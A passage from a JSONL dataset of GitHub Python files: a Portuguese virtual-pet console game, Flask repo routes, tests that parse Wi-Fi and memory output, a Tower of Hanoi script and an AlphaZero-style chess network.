'nt':\n\t\t\t\t\tos.system('cls')\n\t\t\t\telse:\n\t\t\t\t\tos.system('clear')\n\t\t\t\tprint('-' *50, '\\n')\n\t\t\t\tprint(' (u_u) {} dormindo...' .format(self.nome))\n\t\t\t\tprint('-' *50)\n\t\t\t\tsono = ['ZZZZZzzzzzz......','ZZZZzzz...','ZZZzz..','Zz..','...']\n\t\t\t\tfor i in range(0,5):\n\t\t\t\t\tprint('\\n', sono[i])\n\t\t\t\t\ttime.sleep(0.8)\n\t\t\t\ttime.sleep(0.7)\n\t\t\t\tinput('\\nDigite ENTER para acordar o {} ' .format(self.nome))\n\t\t\t\tself.idade += 1\n\t\t\t\tif self.fome >= 50:\n\t\t\t\t\tself.fome = 100\n\t\t\t\telse:\n\t\t\t\t\tself.fome += 50\n\t\t\t\tif self.saude > 70:\n\t\t\t\t\tself.saude = 100\n\t\t\t\telse:\n\t\t\t\t\tself.saude += 30\n\t\t\t\tself.mostrar_bichinho()\t\t\t\t\n\t\t\t\tbreak\n\t\t\telif opcao == 4:\t\t\t\t\n\t\t\t\tif os.name == 'nt':\n\t\t\t\t\tos.system('cls')\n\t\t\t\telse:\n\t\t\t\t\tos.system('clear')\n\t\t\t\tprint('-' *50, '\\n')\n\t\t\t\tprint(' (;_;) {} chorando...' .format(self.nome))\n\t\t\t\tprint('-' *50)\n\t\t\t\tprint('\\nVocê abandonou o {}!\\n\\n' .format(self.nome))\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Dados Inválidos')\n\t\t\n\tdef alterar_nome(self):\n\t\tif os.name == 'nt':\n\t\t\tos.system('cls')\n\t\telse:\n\t\t\tos.system('clear')\t\t\n\t\tprint('Bichinho Eletrônico')\n\t\tprint('Lembre-se:\\n> O bichinho fica 1 ano mais velho cada vez que dorme.')\n\t\tprint('> Precisa alimentar o seu bichinho.\\n> Cuide da saúde de seu bichinho.')\n\t\tprint('-' *50)\n\t\tn = input('Dê um nome para o seu bichinho eletrônico: ')\n\t\tself.nome = n\n\t\tself.mostrar_bichinho()\n\n\tdef humor_bichinho(self):\n\t\tif (self.fome >= 60) and (self.fome <= 100):\n\t\t\tif self.saude < 40:\n\t\t\t\tprint(' (@_@) {} está doente e com muita fome!' .format(self.nome))\n\t\t\telse:\n\t\t\t\tprint(' (v_v) {} está com muita fome!' .format(self.nome))\n\t\telif (self.fome > 20) and (self.fome <= 59):\n\t\t\tif self.saude < 40:\n\t\t\t\tprint(' (o_o) {} está doente e começando a ficar com fome!' .format(self.nome))\n\t\t\telse:\n\t\t\t\tprint(' (^_^) {} está começando a ficar com fome!' .format(self.nome))\n\t\telse:\n\t\t\tif self.saude < 40:\n\t\t\t\tprint(' (-_-) {} está doente!' .format(self.nome))\n\t\t\telse:\n\t\t\t\tprint(' \\(^_^)/ {} está muito contente!' .format(self.nome))\n\t\n\tdef alimentando_bichinho(self):\n\t\tself.limpar_tela()\n\t\tprint('Alimente o {} '.format(self.nome))\n\t\tprint('[1] - Frutas\\n[2] - Massas\\n[3] - Doces\\n[4] - Bebidas\\n')\n\t\twhile True:\n\t\t\topcao = int(input('>> '))\n\t\t\tif opcao == 1:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[1] - Frutas ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_frutas:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(1)\n\t\t\t\tbreak\n\t\t\telif opcao == 2:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[2] - Massas ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_massas:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(2)\n\t\t\t\tbreak\n\t\t\telif opcao == 3:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[3] - Doces ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_doces:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(3)\n\t\t\t\tbreak\n\t\t\telif opcao == 4:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[4] - Frutas ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_bebidas:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(4)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Dados inválidos! ')\n\t\n\tdef comida(self, dados_comida):\n\t\tif dados_comida == 1:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_frutas:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} comendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\telif dados_comida == 2:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_massas:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} comendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\telif dados_comida == 3:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_doces:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} comendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\telif dados_comida == 4:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_bebidas:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} bebendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\n\tdef saude_bichinho(self):\n\t\tself.limpar_tela()\n\t\tprint('Dê remédio para o {} '.format(self.nome))\n\t\tprint('Remédio ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\tprint('-' *50)\n\t\tfor i in lista_remedios:\n\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\tprint('-' *50)\n\t\tvalidador = False\n\t\twhile True:\n\t\t\tdados = int(input('\\n>> '))\n\t\t\tfor i in lista_remedios:\n\t\t\t\tif dados == i['codigo']:\n\t\t\t\t\tvalidador = True\n\t\t\tif validador == True:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Dados inválidos!')\n\t\tfor i in lista_remedios:\n\t\t\tif i['codigo'] == dados:\n\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\tif self.fome < 0:\n\t\t\t\tself.fome = 0\n\t\t\tif self.saude > 100:\n\t\t\t\tself.saude = 100\n\t\tprint('{} tomando remédio ....' .format(self.nome))\n\t\ttime.sleep(3)\n\t\tself.mostrar_bichinho()\n\nb = BichinhoEletrônico()\nb.alterar_nome()\n","repo_name":"rafaelpederiva/Resposta_Python_Brasil","sub_path":"Exercícios de Classes/Exercício 07 - Bichinho Virtual.py","file_name":"Exercício 07 - Bichinho Virtual.py","file_ext":"py","file_size_in_byte":10119,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71662524641","text":"import json\nimport typing as t\n\nfrom flask import Blueprint, request, redirect, url_for\n\nfrom api.api_model.index import ResponseRepoAdd, RepoListItem\nfrom api.routes import login_required, current_user\nfrom models.repo import MyRepo\nfrom models.user import User\nfrom services.repo import ServiceRepo\nfrom src.utils import log, timestamp_to_date\n\nmain = Blueprint('repo', __name__)\n\n\n@main.route('/add', methods=['POST'])\n@login_required\ndef add():\n form: dict = request.form\n log(\"add form\", form)\n repo_name: str = form.get(\"repo_name\")\n description: str = form.get('description', '')\n user: User = current_user()\n\n add_result = ServiceRepo.add_repo(user_id=user.id, repo_name=repo_name, description=description)\n result: bool = add_result[0]\n repo_info: MyRepo = add_result[1]\n #\n response = ResponseRepoAdd(\n result=result,\n )\n if result:\n response.repo_id = repo_info.id\n response.repo_name = repo_info.repo_name\n return redirect(url_for('myself', username=user.username))\n\n\n@main.route('/list', methods=['GET'])\n@login_required\ndef get_list():\n user: User = current_user()\n repo_list: t.List[MyRepo] = MyRepo.find_all(user_id=user.id)\n result: t.List[t.Dict] = []\n for repo in repo_list:\n item = RepoListItem(\n repo_id=repo.id,\n repo_name=repo.repo_name,\n create_time=timestamp_to_date(repo.create_time),\n )\n result.append(item.dict())\n return dict(\n repo_list=result,\n )\n","repo_name":"jane255/myGitWeb","sub_path":"src/api/routes/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45162268760","text":"import sysmgmt.app.sysinfo as sysinfo\n\n\ndef test_parseIwConfigConnected():\n iwconfigStr = \"\"\"wlan0 IEEE 802.11 ESSID:\"PanicAtTheDisco\" \n Mode:Managed Frequency:2.437 GHz Access Point: 06:63:D3:77:91:F0 \n Bit Rate=72.2 Mb/s Tx-Power=31 dBm \n Retry short limit:7 RTS thr:off Fragment thr:off\n Power Management:on\n Link Quality=60/70 Signal level=-36 dBm \n Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0\n Tx excessive retries:289 Invalid misc:0 Missed beacon:0\"\"\"\n tokens = sysinfo.Wifi.parseIwConfig(iwconfigStr)\n assert 5 == len(tokens)\n assert \"PanicAtTheDisco\" == tokens[\"ssid\"]\n assert 2.437 == tokens[\"frequency\"]\n assert \"06:63:D3:77:91:F0\" == tokens[\"accesspoint\"]\n assert 0.857 == tokens[\"linkQuality\"]\n assert -36 == tokens[\"signalLevel\"]\n\n\ndef test_parseIwConfigDisconnected():\n iwconfigStr = \"\"\"wlan0 IEEE 802.11 ESSID:off/any \n Mode:Managed Access Point: Not-Associated Tx-Power=31 dBm \n Retry short limit:7 RTS thr:off Fragment thr:off\n Power Management:on\"\"\"\n tokens = sysinfo.Wifi.parseIwConfig(iwconfigStr)\n assert 5 == len(tokens)\n assert tokens[\"ssid\"] is None\n assert tokens[\"frequency\"] is None\n assert tokens[\"accesspoint\"] == \"Not-Associated\"\n assert tokens[\"linkQuality\"] is None\n assert tokens[\"signalLevel\"] is None\n\n\ndef test_parseIwConfigMalformed():\n iwconfigStr = \"\"\"wlan0 IEEE 802.11 ESSIID:\"PanicAtTheDisco\" \n Mode:Managed Frequency:2.4B37 GHz Access Point: 06:63:D3:77:91:F0 \n Bit Rate=72.2 Mb/s Tx-Power=31 dBm \n Retry short limit:7 RTS thr:off Fragment thr:off\n Power Management:on\n Link Quality=6070 Signal level=--36 dBm \n Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0\n Tx excessive retries:289 Invalid misc:0 Missed beacon:0\"\"\"\n tokens = sysinfo.Wifi.parseIwConfig(iwconfigStr)\n assert 5 == len(tokens)\n assert tokens[\"ssid\"] is None\n assert tokens[\"frequency\"] is None\n assert tokens[\"accesspoint\"] == \"06:63:D3:77:91:F0\"\n assert tokens[\"linkQuality\"] is None\n assert tokens[\"signalLevel\"] is None\n\n\ndef test_parseIwlistWelformed():\n iwlistStr = \"\"\"- Cell 01 - Address: 96:AE:10:E1:03:CC\n Frequency:2.437 GHz (Channel 6)\n Quality=57/70 Signal level=-53 dBm\n Encryption key:on\n ESSID:\"PanicAtTheDisco\"\n Cell 02 - Address: 8C:19:B5:B1:63:99\n Frequency:2.437 GHz (Channel 6)\n Quality=49/70 Signal level=-61 dBm\n Encryption key:on\n ESSID:\"Salt_2GHz_B16397\"\n Cell 03 - Address: 96:AE:10:E1:03:CC\n Frequency:2.437 GHz (Channel 6)\n Quality=60/70 Signal level=-50 dBm\n Encryption key:on\n ESSID:\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n Cell 04 - Address: 74:DA:38:45:37:0A\n Frequency:2.417 GHz (Channel 2)\n Quality=42/70 Signal level=-68 dBm\n Encryption key:on\n ESSID:\"edimax_2.4G_45370A\"\n Cell 05 - Address: 8C:19:B5:B1:63:98\n Frequency:5.26 GHz (Channel 52)\n Quality=27/70 Signal level=-83 dBm\n Encryption key:on\n ESSID:\"Salt_5GHz_B16397\"\n Cell 06 - Address: 72:19:B5:B1:63:9A\n Frequency:5.26 GHz (Channel 52)\n Quality=27/70 Signal level=-83 dBm\n Encryption key:on\n ESSID:\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n Cell 07 - Address: 62:19:B5:B1:63:9B\n Frequency:2.437 GHz (Channel 6)\n Quality=48/70 Signal level=-62 dBm\n Encryption key:on\n ESSID:\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\"\"\n wifilist = sysinfo.Wifi.parseIwList(iwlistStr)\n assert len(wifilist) == 7\n first = wifilist[0]\n assert first[\"ssid\"] == \"PanicAtTheDisco\"\n assert first[\"frequency\"] == 2.437\n assert first[\"accesspoint\"] == \"96:AE:10:E1:03:CC\"\n assert first[\"linkQuality\"] == 0.814\n assert first[\"signalLevel\"] == -53.0\n assert first[\"encrypted\"] is True\n\n\ndef test_parseIwlistInvalidString():\n iwlistStr = \"\"\"wlan0 Interface doesn't support scanning.\"\"\"\n wifilist = sysinfo.Wifi.parseIwList(iwlistStr)\n assert len(wifilist) == 0\n\n\ndef test_parseWpaSupplicantConfWellformed():\n wpaSupplicantStr = \"\"\"ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\n update_config=1\n country=CH\n\n network={\n ssid=\"TestSSID\"\n psk=\"Test123\"\n }\"\"\"\n wpaSupConf = sysinfo.Wifi.parseWpaSupplicantConf(wpaSupplicantStr)\n assert \"ctrl_interface\" in wpaSupConf\n assert \"update_config\" in wpaSupConf\n assert \"country\" in wpaSupConf\n assert \"networks\" in wpaSupConf\n assert wpaSupConf[\"country\"] == \"CH\"\n assert len(wpaSupConf[\"networks\"]) == 1\n assert \"ssid\" in wpaSupConf[\"networks\"][0]\n assert \"psk\" in wpaSupConf[\"networks\"][0]\n\n\ndef test_writeWpaSupplicantConfToString():\n referenceStr = (\n \"# autogenerated config by easyadsb sysmgmt\\n\"\n \"ctrl_interface=dummy ctrl str\\n\"\n \"update_config=0\\n\"\n \"country=CH\\n\"\n \"network={\\n\"\n \"\\tssid=\\\"dummy_ssid\\\"\\n\"\n \"\\tpsk=passwordhash123\\n\"\n \"}\\n\"\n )\n wpaSupConf = {\n \"ctrl_interface\": \"dummy ctrl str\",\n \"update_config\": 0,\n \"country\": \"CH\",\n \"networks\": [\n {\n \"ssid\": \"dummy_ssid\",\n \"psk\": \"passwordhash123\"\n }\n ]\n }\n wpaSupConfStr = sysinfo.Wifi.wpaSupplicantConfToStr(wpaSupConf)\n assert wpaSupConfStr == referenceStr\n\n\ndef test_parseMemInfoWellformed():\n meminfoList = [\n \"MemTotal: 1917292 kB\",\n \"MemFree: 567356 kB\",\n \"MemAvailable: 1155448 kB\",\n \"Buffers: 69816 kB\",\n \"Cached: 526020 kB\",\n \"SwapCached: 0 kB\",\n \"Active: 238264 kB\",\n \"Inactive: 977668 kB\",\n \"Active(anon): 1496 kB\",\n \"Inactive(anon): 578716 kB\",\n \"Active(file): 236768 kB\",\n \"Inactive(file): 398952 kB\",\n \"Unevictable: 3012 kB\",\n \"Mlocked: 16 kB\",\n \"HighTotal: 1232896 kB\",\n \"HighFree: 64344 kB\",\n \"LowTotal: 684396 kB\",\n \"LowFree: 503012 kB\",\n \"SwapTotal: 102396 kB\",\n \"SwapFree: 102396 kB\",\n \"Dirty: 400 kB\",\n \"Writeback: 0 kB\",\n \"AnonPages: 623116 kB\",\n \"Mapped: 217768 kB\",\n \"Shmem: 5736 kB\",\n \"KReclaimable: 51048 kB\",\n \"Slab: 73744 kB\",\n \"SReclaimable: 51048 kB\",\n \"SUnreclaim: 22696 kB\",\n \"KernelStack: 3096 kB\",\n \"PageTables: 8384 kB\",\n \"NFS_Unstable: 0 kB\",\n \"Bounce: 0 kB\",\n \"WritebackTmp: 0 kB\",\n \"CommitLimit: 1061040 kB\",\n \"Committed_AS: 1543004 kB\",\n \"VmallocTotal: 245760 kB\",\n \"VmallocUsed: 6396 kB\",\n \"VmallocChunk: 0 kB\",\n \"Percpu: 544 kB\",\n \"CmaTotal: 327680 kB\",\n \"CmaFree: 314548 kB\",\n ]\n memInfo = sysinfo.Resources.parseMemInfo(meminfoList)\n assert 3 == len(memInfo)\n assert 1917292 == memInfo[\"memTotal\"]\n assert 567356 == memInfo[\"memFree\"]\n assert 0 == memInfo[\"swapCached\"]\n\n\ndef test_parseMemInfoMissingEntries():\n meminfoList = [\n \"MemTotal: 1917292 kB\",\n \"SwapCached: 0 kB\",\n ]\n memInfo = sysinfo.Resources.parseMemInfo(meminfoList)\n assert 3 == len(memInfo)\n assert 1917292 == memInfo[\"memTotal\"]\n assert memInfo[\"memFree\"] is None\n assert 0 == memInfo[\"swapCached\"]\n\n\ndef test_parseMemInfoMalformed():\n meminfoList = [\"MemTotal: 1917A292 kB\", \"SwapCached: 0:\", \"MemFree\"]\n memInfo = sysinfo.Resources.parseMemInfo(meminfoList)\n assert 3 == len(memInfo)\n assert memInfo[\"memTotal\"] is None\n assert memInfo[\"memFree\"] is None\n assert memInfo[\"swapCached\"] is None\n\n\ndef test_parseCpuTempWellformed():\n temperature = sysinfo.Resources.parseCpuTemperature(\"68166\")\n assert 68.166 == temperature\n\n\ndef test_parseCpuTempMalformed():\n temperature = sysinfo.Resources.parseCpuTemperature(\"banana\")\n assert temperature is None\n\n","repo_name":"gravity981/easyadsb","sub_path":"core/sysmgmt/tests/test_sysinfo.py","file_name":"test_sysinfo.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28933851275","text":"t = int(input())\r\nn = []\r\nfor i in range(t):\r\n x, y = map(int, input().split())\r\n n.append((x, y))\r\n\r\n\r\ndef toh(n, val, a=1, b=2, c=3):\r\n moves = (2**n) - 1\r\n for i in range(1, moves + 1):\r\n if i % 3 == 1:\r\n print(str(a) + \" \" + str(c))\r\n elif i % 3 == 2:\r\n print(str(a) + \" \" + str(b))\r\n elif i % 3 == 0:\r\n print(str(b) + \" \" + str(c))\r\nfor i in n:\r\n toh(i[0], i[1])\r\n","repo_name":"hirenbhanushali/codeforces","sub_path":"old man.py","file_name":"old man.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23332084924","text":"\"\"\"\nAlphazero network implementation getted from paper:\nMastering the game of Go without human knowledge, Silver et al.\n\n'The input features st are processed by a residual tower that consists of a single\nconvolutional block followed by either 19 or 39 residual blocks.\nThe convolutional block applies the following modules:\n(1) A convolution of 256 filters of kernel size 3 ×​3 with stride 1\n(2) Batch normalization 18\n(3) A rectifier nonlinearity\nEach residual block applies the following modules sequentially to its input:\n(1) A convolution of 256 filters of kernel size 3 ×​3 with stride 1\n(2) Batch normalization\n(3) A rectifier nonlinearity\n(4) A convolution of 256 filters of kernel size 3 ×​3 with stride 1\n(5) Batch normalization\n(6) A skip connection that adds the input to the block\n(7) A rectifier nonlinearity\nThe output of the residual tower is passed into two separate ‘heads’ for\ncomputing the policy and value. The policy head applies the following modules:\n(1) A convolution of 2 filters of kernel size 1 ×​1 with stride 1\n(2) Batch normalization\n(3) A rectifier nonlinearity\n(4) A fully connected linear layer that outputs a vector of size 192 +​ 1 =​ 362,\ncorresponding to logistic probabilities for all intersections and the pass move\nThe value head applies the following modules:\n(1) A convolution of 1 filter of kernel size 1 ×​1 with stride 1\n(2) Batch normalization\n(3) A rectifier nonlinearity\n(4) A fully connected linear layer to a hidden layer of size 256\n(5) A rectifier nonlinearity\n(6) A fully connected linear layer to a scalar\n(7) A tanh nonlinearity outputting a scalar in the range [−​1, 1]\nThe overall network depth, in the 20- or 40-block network, is 39 or 79 parameterized layers, respectively,\nfor the residual tower, plus an additional 2 layers for the policy head and 3 layers for the value head.\nWe note that a different variant of residual networks was simultaneously applied\nto computer Go33 and achieved an amateur dan-level performance; however, this\nwas restricted to a single-headed policy network trained solely by supervised learning.\n\nNeural network architecture comparison. Figure 4 shows the results of a comparison between network architectures.\nSpecifically, we compared four different neural networks:\n(1) dual–res: the network contains a 20-block residual tower, as described above,\nfollowed by both a policy head and a value head. This is the architecture used in AlphaGo Zero.\n(2) sep–res: the network contains two 20-block residual towers. The first tower\nis followed by a policy head and the second tower is followed by a value head.\n(3) dual–conv: the network contains a non-residual tower of 12 convolutional\nblocks, followed by both a policy head and a value head.\n(4) sep–conv: the network contains two non-residual towers of 12 convolutional\nblocks. The first tower is followed by a policy head and the second tower is followed\nby a value head. This is the architecture used in AlphaGo Lee.\nEach network was trained on a fixed dataset containing the final 2 million\ngames of self-play data generated by a previous run of AlphaGo Zero, using\nstochastic gradient descent with the annealing rate, momentum and regularization hyperparameters described for\nthe supervised learning experiment; however, cross-entropy and MSE components were weighted equally,\nsince more data was available.'\n\"\"\"\nimport chess\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import StepLR\n\nimport lightning.pytorch as pl\n\nfrom dinora.encoders.board_representation import board_to_tensor\nfrom dinora.encoders.policy import extract_prob_from_policy\n\n\ndef softmax(x, tau=1.0):\n e_x = np.exp(x / tau)\n return e_x / e_x.sum()\n\n\ndef dummy_wdl(scalar):\n wdl = softmax(np.array([scalar, 0, -scalar]))\n return wdl\n\n\nclass ResBlock(nn.Module):\n def __init__(self, filters: int):\n super().__init__()\n self.body = nn.Sequential(\n nn.Conv2d(\n in_channels=filters,\n out_channels=filters,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=filters),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=filters,\n out_channels=filters,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=filters),\n )\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.relu(self.body(x) + x)\n\n\nclass AlphaNet(pl.LightningModule):\n def __init__(\n self,\n filters: int = 256,\n res_blocks: int = 19,\n policy_channels: int = 64,\n value_channels: int = 8,\n value_fc_hidden: int = 256,\n learning_rate: float = 0.001,\n lr_scheduler_gamma: float = 1.0,\n lr_scheduler_freq: int = 1000,\n ):\n super().__init__()\n self.learning_rate = learning_rate\n self.lr_scheduler_gamma = lr_scheduler_gamma\n self.lr_scheduler_freq = lr_scheduler_freq\n\n self.convblock = nn.Sequential(\n nn.Conv2d(\n in_channels=18,\n out_channels=filters,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=filters),\n nn.ReLU(),\n )\n\n self.res_blocks = nn.Sequential(*(ResBlock(filters) for _ in range(res_blocks)))\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(\n in_channels=filters,\n out_channels=policy_channels,\n kernel_size=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=policy_channels),\n nn.ReLU(),\n nn.Flatten(),\n nn.Linear(in_features=policy_channels * 8 * 8, out_features=1880),\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(\n in_channels=filters,\n out_channels=value_channels,\n kernel_size=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=value_channels),\n nn.ReLU(),\n nn.Flatten(),\n nn.Linear(in_features=value_channels * 8 * 8, out_features=value_fc_hidden),\n nn.ReLU(),\n nn.Linear(in_features=value_fc_hidden, out_features=1),\n nn.Tanh(),\n )\n\n def forward(self, x):\n x = self.convblock(x)\n x = self.res_blocks(x)\n return self.policy_head(x), self.value_head(x)\n\n def training_step(self, batch, batch_idx):\n x, (y_policy, y_value) = batch\n batch_len = len(x)\n\n y_hat_policy, y_hat_value = self(x)\n\n policy_loss = F.cross_entropy(y_hat_policy, y_policy)\n value_loss = F.mse_loss(y_hat_value, y_value)\n cumulative_loss = policy_loss + value_loss\n\n policy_accuracy = (\n (y_hat_policy.argmax(1) == y_policy).float().sum().item()\n ) / batch_len\n\n self.log_dict(\n {\n \"train/policy_accuracy\": policy_accuracy,\n \"train/policy_loss\": policy_loss,\n \"train/value_loss\": value_loss,\n \"train/cumulative_loss\": cumulative_loss,\n }\n )\n\n return cumulative_loss\n\n def validation_step(self, batch, batch_idx):\n x, (y_policy, y_value) = batch\n batch_len = len(x)\n y_hat_policy, y_hat_value = self(x)\n\n policy_accuracy = (\n (y_hat_policy.argmax(1) == y_policy).float().sum().item()\n ) / batch_len\n\n self.log_dict(\n {\n \"validation/policy_accuracy\": policy_accuracy,\n \"validation/policy_loss\": F.cross_entropy(\n y_hat_policy, y_policy\n ).item(),\n \"validation/value_loss\": F.mse_loss(y_hat_value, y_value).item(),\n }\n )\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n scheduler = StepLR(\n optimizer, step_size=1, gamma=self.lr_scheduler_gamma, verbose=True\n )\n return {\n \"optimizer\": optimizer,\n \"lr_scheduler\": {\n \"scheduler\": scheduler,\n \"interval\": \"step\",\n \"frequency\": self.lr_scheduler_freq,\n },\n }\n\n def eval_by_network(self, board: chess.Board):\n board_tensor = board_to_tensor(board)\n get_prob = extract_prob_from_policy\n\n with torch.no_grad():\n raw_policy, raw_value = self(\n torch.from_numpy(board_tensor).reshape((1, 18, 8, 8)).to(self.device)\n )\n\n outcome_logits = raw_value[0].cpu().item()\n outcomes_probs = dummy_wdl(outcome_logits)\n\n policy = raw_policy[0].cpu()\n\n moves = list(board.legal_moves)\n move_logits = [get_prob(policy, move, not board.turn) for move in moves]\n\n move_priors = softmax(np.array(move_logits))\n priors = dict(zip(moves, move_priors))\n\n return priors, outcomes_probs\n\n def raw_evaluate(self, board: chess.Board):\n board_tensor = board_to_tensor(board)\n get_prob = extract_prob_from_policy\n\n with torch.no_grad():\n raw_policy, raw_value = self(\n torch.from_numpy(board_tensor).reshape((1, 18, 8, 8)).to(self.device)\n )\n\n outcome_logits = raw_value[0].cpu().item()\n\n policy = raw_policy[0].cpu()\n\n moves = list(board.legal_moves)\n move_logits = [get_prob(policy, move, not board.turn) for move in moves]\n\n move_priors = softmax(np.array(move_logits))\n priors = dict(zip(moves, move_priors))\n\n return priors, outcome_logits\n\n def evaluate(self, board: chess.Board):\n result = board.result(claim_draw=True)\n if result == \"*\":\n # Game is not ended\n # evaluate by using ANN\n priors, value_estimate = self.raw_evaluate(board)\n elif result == \"1/2-1/2\":\n # It's already draw\n # or we can claim draw, anyway `value_estimate` is 0.0\n # TODO: should I set priors = {}?\n # It's logical to set it empty because there is no need\n # to calculate deeper already draw position,\n # but with low time/nodes search, it leads to\n # empty node.children bug\n priors, _ = self.raw_evaluate(board)\n value_estimate = 0.0\n else:\n # result == '1-0' or result == '0-1'\n # we are checkmated because 